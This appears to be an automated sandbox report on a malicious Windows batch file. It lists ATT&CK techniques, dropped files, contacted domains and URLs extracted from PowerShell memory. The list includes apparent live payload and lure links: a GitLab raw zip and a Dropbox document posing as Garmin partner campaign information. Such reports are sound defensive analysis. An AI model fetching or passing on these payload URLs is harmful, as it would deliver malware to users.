                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                hngarm13de02.bat8%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\Public\Document\Scripts\normalizer.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip3.12.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip3.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pywin32_postinstall.py0%ReversingLabs
                C:\Users\Public\Document\Scripts\pywin32_testall.py0%ReversingLabs
                C:\Users\Public\Document\Scripts\wsdump.exe0%ReversingLabs
                C:\Users\Public\Document\tcl\dde1.4\tcldde14.dll0%ReversingLabs
                C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exe0%ReversingLabs
                C:\Users\Public\Document\tcl\reg1.3\tclreg13.dll0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com/cd/0/get/Cgf_M__sO2v5p-OouMPp6PUPdVW_0%Avira URL Cloudsafe
                https://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                http://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                https://mhammond.github.io/pywin32_installers.html0%Avira URL Cloudsafe
                https://core.tcl-lang.org/tips/doc/main/tip/477.md)0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                edge-block-www-env.dropbox-dns.com
                162.125.65.15
                truefalse
                  high
                  gitlab.com
                  172.65.251.78
                  truefalse
                    high
                    www-env.dropbox-dns.com
                    162.125.69.18
                    truefalse
                      high
                      www.dropbox.com
                      unknown
                      unknownfalse
                        high
                        uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com
                        unknown
                        unknownfalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1false
                            high
                            https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zipfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://gitlab.compowershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.dropbox.com/service_worker.jspowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://gitlab.com/-/sandbox/;powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://paper.dropbox.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.microsoftpowershell.exe, 00000012.00000002.2929895848.000001B1903C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.hellofax.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://pal-test.adyen.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.dropbox.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://snowplow.trx.gitlab.netpowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://app.hellosign.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.hellosign.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.dropbox.com/page_success/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://gitlab.compowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251345F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.dropbox.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.dropbox.com/pithos/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://sales.dropboxbusiness.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://photos.dropbox.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://a.sprig.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.docsend.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://gitlab.com/assets/powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://navi.dropbox.jp/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contoso.com/powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.1742112837.0000022CAF5C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742112837.0000022CAF481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com/cd/0/get/Cgf_M__sO2v5p-OouMPp6PUPdVW_powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.dropbox.com/static/api/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.dropboxstatic.com/static/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://apis.google.compowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://officeapps-df.live.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://api.login.yahoo.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://mhammond.github.io/pywin32_installers.htmlpywin32_postinstall.py.18.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.1726663694.0000022C9F411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251339C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2934757524.000001B1921F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://sentry.gitlab.netpowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://login.yahoo.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://docsend.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.dropbox.com/playlist/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.recaptcha.net/powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://onedrive.live.com/pickerpowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.1742112837.0000022CAF5C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742112837.0000022CAF481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025135434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://showcase.dropbox.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.dropbox.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2836573059.0000025133BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2836573059.0000025133BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://go.micropowershell.exe, 0000000B.00000002.1726663694.0000022CA0044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251345F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://new-sentry.gitlab.netpowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docpowershell.exe, 0000000B.00000002.1744952074.0000022CB7410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://gitlab.com/fgsd1/gg/-/raw/main/fga1312.zippowershell.exe, 0000000D.00000002.2895893087.000002514BCD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/garmin_campaign_information_for_partners_v6.docpowershell.exe, 0000000B.00000002.1745787846.0000022CB7530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www-env.dropbox-dns.compowershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2836573059.0000025133BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://docs.google.com/document/fsip/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://core.tcl-lang.org/tips/doc/main/tip/477.md)targets.vc.18.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://help.dropbox.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://docs.google.com/presentation/fsip/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://canny.io/sdk.jspowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://gitlab.com/-/sandbox/powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://gitlab.com/admin/powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://customers.gitlab.compowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.google.com/recaptcha/powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://sourcegraph.compowershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://aka.ms/pscore68powershell.exe, 0000000B.00000002.1726663694.0000022C9F411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251339C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2934757524.000001B1921F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://dl-web.dropbox.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://app.hellofax.com/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://cfl.dropboxstatic.com/static/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.paypal.com/sdk/jspowershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
